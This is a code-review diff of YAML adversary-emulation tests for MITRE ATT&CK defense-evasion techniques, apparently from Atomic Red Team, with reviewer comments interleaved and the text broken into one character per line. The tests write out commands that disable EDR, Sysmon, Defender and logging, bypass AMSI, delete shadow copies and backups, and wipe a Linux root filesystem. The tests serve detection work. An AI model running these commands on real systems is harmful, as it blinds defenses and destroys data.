|
|
|
command: 'setenforce 0
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Disable Carbon Black Response
|
|
|
|
|
description: 'Disables Carbon Black Response
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Disable LittleSnitch
|
|
|
|
|
description: 'Disables LittleSnitch
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Disable OpenDNS Umbrella
|
|
|
|
|
description: 'Disables OpenDNS Umbrella
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Unload Sysmon Filter Driver
|
|
|
|
|
description: 'Unloads the Sysinternals Sysmon filter driver without stopping
|
|
|
|
|
the Sysmon service.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution,
|
|
|
|
|
run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
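Review bot: The new block-scalar description for "Unload Sysmon Filter Driver" contains a duplicated, truncated phrase — `To verify successful execution, o verify successful execution,` — which reads as a paste error. The line should be `Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution,` followed by the existing `run the prereq_commands and it should fail with an error of "sysmon filter must be loaded".` (also dropping the stray apostrophe in `prereq_command's`). The +/- markers are not preserved in this view, so I am reading the `description: |` form as the new side.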
|
|
|
|
@@ -6928,24 +6958,42 @@ defense-evasion:
|
|
|
|
|
the default)
|
|
|
|
|
type: string
|
|
|
|
|
default: SysmonDrv
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: Sysmon filter must be loaded
|
|
|
|
|
prereq_command: 'fltmc.exe filters | findstr #{sysmon_driver}'
|
|
|
|
|
get_prereq_command: echo Automated installer not implemented yet, please install
|
|
|
|
|
Sysmon manually
|
|
|
|
|
- description: Sysmon must be downloaded
|
|
|
|
|
prereq_command: if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon
|
|
|
|
|
2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else {
|
|
|
|
|
exit 1 }
|
|
|
|
|
get_prereq_command: |-
|
|
|
|
|
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip"
|
|
|
|
|
Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force
|
|
|
|
|
Remove-Item $env:TEMP\Sysmon.zip -Force
|
|
|
|
|
- description: sysmon must be Installed
|
|
|
|
|
prereq_command: if(sc.exe query sysmon | findstr sysmon) { exit 0 } else {
|
|
|
|
|
exit 1 }
|
|
|
|
|
get_prereq_command: |-
|
|
|
|
|
if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
|
|
|
|
|
{ Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i}
|
|
|
|
|
- description: sysmon filter must be loaded
|
|
|
|
|
prereq_command: 'if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0
|
|
|
|
|
} else { exit 1 }'
|
|
|
|
|
get_prereq_command: |-
|
|
|
|
|
sysmon -u
|
|
|
|
|
sysmon -accepteula -i
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
prereq_command: 'fltmc.exe filters | findstr #{sysmon_driver}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
command: 'fltmc.exe unload #{sysmon_driver}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: |
|
|
|
|
|
sc stop sysmon
|
|
|
|
|
fltmc.exe load #{sysmon_driver}
|
|
|
|
|
sc start sysmon
|
|
|
|
|
sysmon -u -i > nul 2>&1
|
|
|
|
|
sysmon -i -accepteula -i > nul 2>&1
|
|
|
|
|
%temp%\Sysmon\sysmon.exe -u > nul 2>&1
|
|
|
|
|
%temp%\Sysmon\sysmon.exe -accepteula -i > nul 2>&1
|
|
|
|
|
- name: Disable Windows IIS HTTP Logging
|
|
|
|
|
description: |
|
|
|
|
|
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
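Review bot: The new cleanup_command uninstalls and reinstalls Sysmon (`sysmon -u -i`, `sysmon -i -accepteula -i`, then the `%temp%\Sysmon\sysmon.exe` pair) without a `-c <config>` argument, so on a host that had a tuned Sysmon configuration the cleanup leaves Sysmon running with the default config — a telemetry regression that outlives the test — and `sysmon -u -i` appears to mix the uninstall and install switches. The added get_prereq_command fetches `Sysmon.zip` with Invoke-WebRequest and later runs the extracted binary with admin rights with no hash or signature check on what was downloaded. I would limit the uninstall/reinstall to the case where the test itself installed Sysmon from `$env:TEMP\Sysmon` and otherwise stop after `fltmc.exe load #{sysmon_driver}` / `sc start sysmon`, and check `Get-AuthenticodeSignature` on the extracted `Sysmon.exe` before executing it. The +/- markers are not preserved in this view, so which of the two "Sysmon filter must be loaded" dependencies survives is inferred from the hunk line counts.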
|
|
|
|
@@ -6962,19 +7010,19 @@ defense-evasion:
|
|
|
|
|
prereq_command: 'if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {exit
|
|
|
|
|
0} else {exit 1}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
|
|
|
|
|
/section:httplogging /dontLog:true
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
|
|
|
|
|
/section:httplogging /dontLog:false
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Uninstall Sysmon
|
|
|
|
|
description: 'Uninstall Sysinternals Sysmon for Defense Evasion
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7001,10 +7049,10 @@ defense-evasion:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'sysmon -u
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'sysmon -i -accepteula
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: AMSI Bypass - AMSI InitFailed
|
|
|
|
|
description: |
|
|
|
|
|
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
|
|
|
|
@@ -7028,16 +7076,16 @@ defense-evasion:
|
|
|
|
|
command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}"
|
|
|
|
|
-Recurse
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers"
|
|
|
|
|
-Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Disable Arbitrary Security Windows Service
|
|
|
|
|
description: 'With administrative rights, an adversary can disable Windows Services
|
|
|
|
|
related to security products.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7086,12 +7134,11 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Tamper with Windows Defender ATP PowerShell
|
|
|
|
|
description: 'Attempting to disable scheduled scanning and other parts of windows
|
|
|
|
|
defender atp
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled
|
|
|
|
|
in Windows settings.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -7108,10 +7155,9 @@ defense-evasion:
|
|
|
|
|
Set-MpPreference -DisableScriptScanning 0
|
|
|
|
|
Set-MpPreference -DisableBlockAtFirstSeen 0
|
|
|
|
|
- name: Tamper with Windows Defender Command Prompt
|
|
|
|
|
description: 'Attempting to disable scheduled scanning and other parts of windows
|
|
|
|
|
defender atp
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.
|
|
|
|
|
However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -7125,9 +7171,9 @@ defense-evasion:
|
|
|
|
|
sc start WinDefend
|
|
|
|
|
sc config WinDefend start=enabled
|
|
|
|
|
- name: Tamper with Windows Defender Registry
|
|
|
|
|
description: 'Disable Windows Defender from starting after a reboot
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be
|
|
|
|
|
grayed out and have no info.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
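Review bot: The new description for "Tamper with Windows Defender Registry" has a typo, `Upen execution` should be `Upon execution`. I am reading the `description: |` form as the new side since the +/- markers are not shown in this view.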
|
|
|
|
@@ -7136,14 +7182,17 @@ defense-evasion:
|
|
|
|
|
command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
|
|
|
|
|
-Name DisableAntiSpyware -Value 1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows
|
|
|
|
|
Defender" -Name DisableAntiSpyware -Value 0
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Disable Microft Office Security Features
|
|
|
|
|
description: |
|
|
|
|
|
Gorgon group may disable Office security features so that their code can run
|
|
|
|
|
Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
|
|
|
|
|
show any warning before editing the document
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
@@ -7163,8 +7212,10 @@ defense-evasion:
|
|
|
|
|
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
|
|
|
|
|
- name: Remove Windows Defender Definition Files
|
|
|
|
|
description: |
|
|
|
|
|
Removing definition files would cause ATP to not fire for AntiMalware
|
|
|
|
|
Check MpCmdRun.exe man page for info on all arguments
|
|
|
|
|
Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.
|
|
|
|
|
On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the
|
|
|
|
|
command will say completed.
|
|
|
|
|
|
|
|
|
|
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
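Review bot: The added sentence in the "Remove Windows Defender Definition Files" description has three typos: `viersions`, `inusfficient` and `privelages` should read `versions`, `insufficient` and `privileges`. The behavioural caveat itself (fails even as admin on 1909+) is useful and worth keeping. The +/- markers are not preserved here, so I am treating the longer description as the new side.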
|
|
|
|
@@ -7174,7 +7225,7 @@ defense-evasion:
|
|
|
|
|
command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions
|
|
|
|
|
-All
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1107:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -7230,7 +7281,7 @@ defense-evasion:
|
|
|
|
|
- name: Delete a single file - Linux/macOS
|
|
|
|
|
description: 'Delete a single file from the temporary directory
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -7243,12 +7294,12 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'rm -f #{file_to_delete}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Delete an entire folder - Linux/macOS
|
|
|
|
|
description: 'Recursively delete the temporary directory and all files contained
|
|
|
|
|
within it
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -7261,12 +7312,12 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'rm -rf #{folder_to_delete}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Overwrite and delete a file with shred
|
|
|
|
|
description: 'Use the `shred` command to overwrite the temporary file and then
|
|
|
|
|
delete it
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7278,123 +7329,122 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'shred -u #{file_to_shred}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Delete a single file - Windows cmd
|
|
|
|
|
description: 'Delete a single file from the temporary directory using cmd.exe
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Delete a single file from the temporary directory using cmd.exe.
|
|
|
|
|
Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_to_delete:
|
|
|
|
|
description: File to delete. Run the prereq command to create it if it does
|
|
|
|
|
not exist.
|
|
|
|
|
type: string
|
|
|
|
|
default: "%temp%\\deleteme_T1107"
|
|
|
|
|
dependency_executor_name: command_prompt
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file to delete must exist on disk at specified location (#{file_to_delete})
|
|
|
|
|
prereq_command: IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
|
|
|
|
|
get_prereq_command: 'echo deleteme_T1107 >> #{file_to_delete}'
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
echo "T1107" > %temp%\T1107.txt
|
|
|
|
|
del /f %temp%\T1107.txt >nul 2>&1
|
|
|
|
|
command: 'del /f #{file_to_delete}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Delete an entire folder - Windows cmd
|
|
|
|
|
description: 'Recursively delete the temporary directory and all files contained
|
|
|
|
|
within it using cmd.exe
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Recursively delete a folder in the temporary directory using cmd.exe.
|
|
|
|
|
Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
folder_to_delete:
|
|
|
|
|
description: Folder to delete. Run the prereq command to create it if it
|
|
|
|
|
does not exist.
|
|
|
|
|
type: string
|
|
|
|
|
default: "%temp%\\deleteme_T1107"
|
|
|
|
|
dependency_executor_name: command_prompt
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file to delete must exist on disk at specified location (#{folder_to_delete})
|
|
|
|
|
prereq_command: IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
|
|
|
|
|
get_prereq_command: 'mkdir #{folder_to_delete}'
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
mkdir %temp%\T1107
|
|
|
|
|
rmdir /s /q %temp%\T1107
|
|
|
|
|
command: 'rmdir /s /q #{folder_to_delete}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Delete a single file - Windows PowerShell
|
|
|
|
|
description: 'Delete a single file from the temporary directory using Powershell
|
|
|
|
|
description: 'Delete a single file from the temporary directory using Powershell.
|
|
|
|
|
Upon execution, no output will be displayed. Use File Explorer to verify the
|
|
|
|
|
file was deleted.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_to_delete:
|
|
|
|
|
description: File to delete. Run the prereq command to create it if it does
|
|
|
|
|
not exist.
|
|
|
|
|
type: string
|
|
|
|
|
default: "$env:TEMP\\deleteme_T1107"
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file to delete must exist on disk at specified location (#{file_to_delete})
|
|
|
|
|
prereq_command: 'if (Test-Path #{file_to_delete}) {exit 0} else {exit 1}'
|
|
|
|
|
get_prereq_command: 'New-Item -Path #{file_to_delete} | Out-Null'
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
New-Item $env:TEMP\T1107.txt
|
|
|
|
|
Remove-Item -path $env:TEMP\T1107.txt
|
|
|
|
|
command: 'Remove-Item -path #{file_to_delete}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Delete an entire folder - Windows PowerShell
|
|
|
|
|
description: 'Recursively delete the temporary directory and all files contained
|
|
|
|
|
within it using Powershell
|
|
|
|
|
description: 'Recursively delete a folder in the temporary directory using Powershell.
|
|
|
|
|
Upon execution, no output will be displayed. Use File Explorer to verify the
|
|
|
|
|
folder was deleted.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
folder_to_delete:
|
|
|
|
|
description: Folder to delete. Run the prereq command to create it if it
|
|
|
|
|
does not exist.
|
|
|
|
|
type: string
|
|
|
|
|
default: "$env:TEMP\\deleteme_folder_T1107"
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The folder to delete must exist on disk at specified location
|
|
|
|
|
(#{folder_to_delete})
|
|
|
|
|
prereq_command: 'if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1}'
|
|
|
|
|
get_prereq_command: 'New-Item -Path #{folder_to_delete} -Type Directory |
|
|
|
|
|
Out-Null'
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
New-Item $env:TEMP\T1107 -ItemType Directory
|
|
|
|
|
Remove-Item -path $env:TEMP\T1107 -recurse
|
|
|
|
|
- name: Delete VSS - vssadmin
|
|
|
|
|
description: 'Delete all volume shadow copies with vssadmin.exe
|
|
|
|
|
command: 'Remove-Item -Path #{folder_to_delete} -Recurse
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'vssadmin.exe Delete Shadows /All /Quiet
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Delete VSS - wmic
|
|
|
|
|
description: 'Delete all volume shadow copies with wmic
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'wmic shadowcopy delete
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: bcdedit
|
|
|
|
|
description: 'This test leverages `bcdedit` to remove boot-time recovery measures.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: |
|
|
|
|
|
bcdedit /set {default} bootstatuspolicy ignoreallfailures
|
|
|
|
|
bcdedit /set {default} recoveryenabled no
|
|
|
|
|
- name: wbadmin
|
|
|
|
|
description: 'This test deletes Windows Backup catalogs.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'wbadmin delete catalog -quiet
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Delete Filesystem - Linux
|
|
|
|
|
description: 'This test deletes the entire root filesystem of a Linux system.
|
|
|
|
|
This technique was used by Amnesia IoT malware to avoid analysis. This test
|
|
|
|
|
is dangerous and destructive, do NOT use on production equipment.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Delete-PrefetchFile
|
|
|
|
|
description: 'Delete a single prefetch file. Deletion of prefetch files is
|
|
|
|
|
a known anti-forensic technique.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count"
|
|
|
|
|
before and after the test to verify that the number of prefetch files decreases by 1.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
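Review bot: The cmd variant of "Delete an entire folder" defaults `folder_to_delete` to `"%temp%\\deleteme_T1107"`, the same path the preceding "Delete a single file - Windows cmd" test uses for `file_to_delete`; once the file test's get_prereq_command has created that file, the folder test's `IF EXIST` prereq passes on the file and `rmdir /s /q` fails (and `mkdir` fails the other way round). The PowerShell pair already avoids this with `deleteme_folder_T1107`, so the cmd default should be `"%temp%\\deleteme_folder_T1107"`, and its dependency description should read `The folder to delete must exist on disk at specified location (#{folder_to_delete})` rather than "The file to delete". The unquoted `del /f #{file_to_delete}` and `rmdir /s /q #{folder_to_delete}` also break if `%temp%` contains a space, whereas the prereq_command already quotes the path; quoting the executor argument the same way is cheap. Markers are not preserved in this view, so I am reading the parameterized `#{...}` forms as the new side.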
|
|
|
|
@@ -7403,27 +7453,35 @@ defense-evasion:
|
|
|
|
|
command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem
|
|
|
|
|
-Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Delete TeamViewer Log Files
|
|
|
|
|
description: |
|
|
|
|
|
Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration.
|
|
|
|
|
This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer
|
|
|
|
|
log file format of TeamViewerXX_Logfile.log
|
|
|
|
|
log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
|
|
|
|
|
|
|
|
|
|
https://twitter.com/SBousseaden/status/1197524463304290305?s=20
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
|
|
|
|
|
teamviewer_log_file:
|
|
|
|
|
description: Teamviewer log file to delete. Run the prereq command to create
|
|
|
|
|
it if it does not exist.
|
|
|
|
|
type: string
|
|
|
|
|
default: "$env:TEMP\\TeamViewer_54.log"
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The folder to delete must exist on disk at specified location
|
|
|
|
|
(#{teamviewer_log_file})
|
|
|
|
|
prereq_command: 'if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit
|
|
|
|
|
1}'
|
|
|
|
|
get_prereq_command: 'New-Item -Path #{teamviewer_log_file} | Out-Null'
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
if ($env:os -eq "Windows_NT") {
|
|
|
|
|
New-Item $env:TEMP\TeamViewer_54.log
|
|
|
|
|
Remove-Item $env:TEMP\TeamViewer_54.log
|
|
|
|
|
} else {
|
|
|
|
|
New-Item $env:HOME\TeamViewer_54.log
|
|
|
|
|
Remove-Item $env:HOME\TeamViewer_54.log
|
|
|
|
|
}
|
|
|
|
|
command: 'Remove-Item #{teamviewer_log_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
T1222:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -7522,7 +7580,7 @@ defense-evasion:
|
|
|
|
|
description: 'Modifies the filesystem permissions of the specified file or folder
|
|
|
|
|
to take ownership of the object.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7534,12 +7592,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'takeown.exe /f #{file_folder_to_own}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Take ownership recursively using takeown utility
|
|
|
|
|
description: 'Modifies the filesystem permissions of the specified folder to
|
|
|
|
|
take ownership of it and its contents.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7551,12 +7609,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'takeown.exe /f #{folder_to_own} /r
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: cacls - Grant permission to specified user or group
|
|
|
|
|
description: 'Modifies the filesystem permissions of the specified file or folder
|
|
|
|
|
to allow the specified user or group Full Control.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7572,12 +7630,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'cacls.exe #{file_or_folder} /grant #{user_or_group}:F
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: cacls - Grant permission to specified user or group recursively
|
|
|
|
|
description: 'Modifies the filesystem permissions of the specified folder and
|
|
|
|
|
contents to allow the specified user or group Full Control.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7593,12 +7651,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'cacls.exe #{file_or_folder} /grant #{user_or_group}:F /t
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: icacls - Grant permission to specified user or group
|
|
|
|
|
description: 'Modifies the filesystem permissions of the specified file or folder
|
|
|
|
|
to allow the specified user or group Full Control.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7614,12 +7672,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
